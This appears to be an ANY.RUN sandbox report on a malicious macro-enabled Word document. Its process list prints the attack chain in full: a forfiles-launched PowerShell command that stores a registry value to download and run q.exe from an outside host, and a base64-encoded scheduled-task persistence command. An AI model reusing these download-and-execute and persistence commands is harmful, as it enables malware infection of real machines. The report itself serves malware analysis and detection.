File name:

Project.final.doc

Full analysis: https://app.any.run/tasks/3e25b12f-9640-48d2-b967-3bd801fe45d4
Verdict: Malicious activity
Analysis date: August 08, 2024, 02:09:55
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: steve, Template: Normal, Last Saved By: steve, Revision Number: 56, Name of Creating Application: Microsoft Office Word, Total Editing Time: 06:43:00, Create Time/Date: Sat Dec 31 17:30:00 2022, Last Saved Time/Date: Sun Feb 19 00:41:00 2023, Number of Pages: 1, Number of Words: 58, Number of Characters: 336, Security: 0
MD5:

BD8FD5709F9815680DA8124656B61F09

SHA1:

5DEDDCF7940D93495D26884CC0D436B0B0D3A011

SHA256:

367FEACBDFAF837D776CF7EC3EDB70F3E94AC1284297E36EAF3B2820F8B29B5B

SSDEEP:

12288:I+iuOqtKYoKEEajqaNzi86WCIANjnWHglBOrXJ6E1YCwCQasoec:I/uOqtKYoKEEaj1m86WN+jnWAlBOrXJq

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses base64 encoding (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Unusual execution from MS Office

      • WINWORD.EXE (PID: 6332)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 6332)

    • Microsoft Office executes commands via PowerShell or Cmd

      • WINWORD.EXE (PID: 6332)

  • SUSPICIOUS

    • Creates XML DOM element (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Sets XML DOM element text (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Changes charset (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Creates a Stream, which may work with files, input/output devices, pipes, or TCP/IP sockets (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Searches and executes a command on selected files

      • forfiles.exe (PID: 7000)

    • Request a resource from the Internet using PowerShell's cmdlet

      • WINWORD.EXE (PID: 6332)
      • cmd.exe (PID: 4100)
      • forfiles.exe (PID: 7000)

    • Runs shell command (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Starts CMD.EXE for commands execution

      • forfiles.exe (PID: 7000)

    • Writes binary data to a Stream object (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Reads data from a binary Stream object (SCRIPT)

      • WINWORD.EXE (PID: 6332)

    • Hides command output

      • cmd.exe (PID: 7064)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4100)
      • cmd.exe (PID: 7064)

    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 7064)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 7064)

  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 532)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7808)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 532)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: 1Table, ExtChar
System: Windows
Word97: No
Title: -
Subject: -
Author: steve
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: steve
Software: Microsoft Office Word
CreateDate: 2022:12:31 17:30:00
ModifyDate: 2023:02:19 00:41:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 393
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 56
TotalEditTime: 6.7 hours
Words: 58
Characters: 336
Pages: 1
Paragraphs: 1
Lines: 2
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
144
Monitored processes
10
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe forfiles.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs ai.exe no specs ping.exe no specs cmd.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
532powershell.exe $p='HKCU:\Identities\{932301EE-2D82-DA96-F9C9-A8996B33EDD3}';$v='iwr -Uri https://telemetry.securityresearch.ca/p -OutFile $home/q.exe;saps $home/q.exe'; ni -Path $p -Force; New-ItemProperty -Path $p -Name 'S' -Value $vC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4100/c "powershell.exe" $p='HKCU:\Identities\{932301EE-2D82-DA96-F9C9-A8996B33EDD3}';$v='iwr -Uri https://telemetry.securityresearch.ca/p -OutFile $home/q.exe;saps $home/q.exe'; ni -Path $p -Force; New-ItemProperty -Path $p -Name 'S' -Value $vC:\Windows\System32\cmd.exeforfiles.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6332"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\AppData\Local\Temp\Project.final.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7000"C:\Windows\System32\forfiles.exe" /p C:\WINDOWS\system32 /s /c "cmd /c @file $p='HKCU:\Identities\{932301EE-2D82-DA96-F9C9-A8996B33EDD3}';$v='iwr -Uri https://telemetry.securityresearch.ca/p -OutFile $home/q.exe;saps $home/q.exe'; ni -Path $p -Force; New-ItemProperty -Path $p -Name 'S' -Value $v " /m p*ll.*e C:\Windows\System32\forfiles.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\forfiles.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\version.dll
c:\windows\system32\gdi32full.dll
7008\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeforfiles.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7064"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 30 > nul & powershell $a = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsAOQAzADIAMwAwADEARQBFAC0AMgBEADgAMgAtAEQAQQA5ADYALQBGADkAQwA5AC0AQQA4ADkAOQA2AEIAMwAzAEUARABEADMAfQAnACkALgBTAA=='; $t = New-ScheduledTaskTrigger -Daily -At 8:45am; Register-ScheduledTask -Action $a -Trigger $t -TaskName 'MicrosoftWin32'C:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
7072\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7120"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "A169E59E-00D7-433F-95CC-B98B10882917" "3B259189-FBEE-41F3-9CE7-7FA24F443BCF" "6332"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
7128ping 127.0.0.1 -n 30 C:\Windows\System32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nsi.dll
7808powershell $a = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsAOQAzADIAMwAwADEARQBFAC0AMgBEADgAMgAtAEQAQQA5ADYALQBGADkAQwA5AC0AQQA4ADkAOQA2AEIAMwAzAEUARABEADMAfQAnACkALgBTAA=='; $t = New-ScheduledTaskTrigger -Daily -At 8:45am; Register-ScheduledTask -Action $a -Trigger $t -TaskName 'MicrosoftWin32'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
27 725
Read events
27 334
Write events
364
Delete events
27

Modification events

(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E01000000000000000500000000000000
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete valueName:0
Value:
ซ괐殺ࠆꯞꝅ莼跳⏺䘅헉꾍樁င$梅摝麨…ީ湕湫睯쥮௅賙ᒳ೅肫
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete keyName:(default)
Value:
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6332
Operation:writeName:0
Value:
0B0E10BECD2188213440498159B5D0C0B3D480230046F0D2D1A481A7BAED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511BC31D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(6332) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
Executable files
0
Suspicious files
113
Text files
52
Unknown types
4

Dropped files

PID
Process
Filename
Type
6332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:76F6053690CAF8F6D31625673744D6C9
SHA256:43BE7C42C16AC8B36C251D24A48594D34F44024389B067C950DEFAF91C590BCE
6332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
532powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xufmcosm.jk3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6332WINWORD.EXEC:\Users\admin\AppData\Local\Temp\cabAFC7.tmpcompressed
MD5:E033CCBC7BA787A2F824CE0952E57D44
SHA256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
532powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_13omnenb.ngg.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6332WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$oject.final.docbinary
MD5:6E5DC33696607CA7465864CF07CB3FE9
SHA256:3F59A98814A8684749E1244B5C1B9E5C5B9A291FC4AC34C3AE7E3E3EAD3C804B
6332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.Sbinary
MD5:07D23AE5E8AEF4F4455FBE1B558F35B3
SHA256:6B8922609DCC02B2E945D14BD71B005A3A7F2EC28CD3C9EFE59579AC5EF94718
6332WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:3910123A490CA0CFD1FA8D767191B169
SHA256:E36F9CCA885E3DE08619F2C6E6F9CB2DBE17C934F8F4C44AC464AEC62C9D8C21
6332WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:67996068DBB142E0559BF8D5E3A4B2FC
SHA256:6BBB0A10652484EB936FAD8416D40D789E333ADA4813A7815E3164A932E462DE
6332WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msbinary
MD5:E4A1661C2C886EBB688DEC494532431C
SHA256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
92
DNS requests
24
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1344
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6332
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6172
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6332
WINWORD.EXE
GET
200
2.16.241.14:80
http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl
unknown
whitelisted
6332
WINWORD.EXE
GET
200
2.16.241.14:80
http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl
unknown
whitelisted
1344
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5984
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
6332
WINWORD.EXE
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
unknown
whitelisted
6332
WINWORD.EXE
GET
200
2.16.241.14:80
http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
1076
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
3888
svchost.exe
239.255.255.250:1900
whitelisted
2120
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4088
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
6332
WINWORD.EXE
52.109.28.46:443
officeclient.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
GB
unknown
6332
WINWORD.EXE
52.113.194.132:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
6332
WINWORD.EXE
2.19.126.151:443
omex.cdn.office.net
Akamai International B.V.
DE
unknown
4
System
192.168.100.255:137
whitelisted
6332
WINWORD.EXE
52.111.231.13:443
messaging.lifecycle.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.78
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
omex.cdn.office.net
  • 2.19.126.151
  • 2.19.126.160
whitelisted
messaging.lifecycle.office.com
  • 52.111.231.13
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
whitelisted
self.events.data.microsoft.com
  • 20.189.173.12
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
www.bing.com
  • 2.23.209.133
  • 2.23.209.130
  • 2.23.209.187
whitelisted
login.live.com
  • 20.190.159.64
  • 20.190.159.0
  • 20.190.159.71
  • 20.190.159.23
  • 20.190.159.2
  • 40.126.31.67
  • 20.190.159.68
  • 40.126.31.71
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Project.final.doc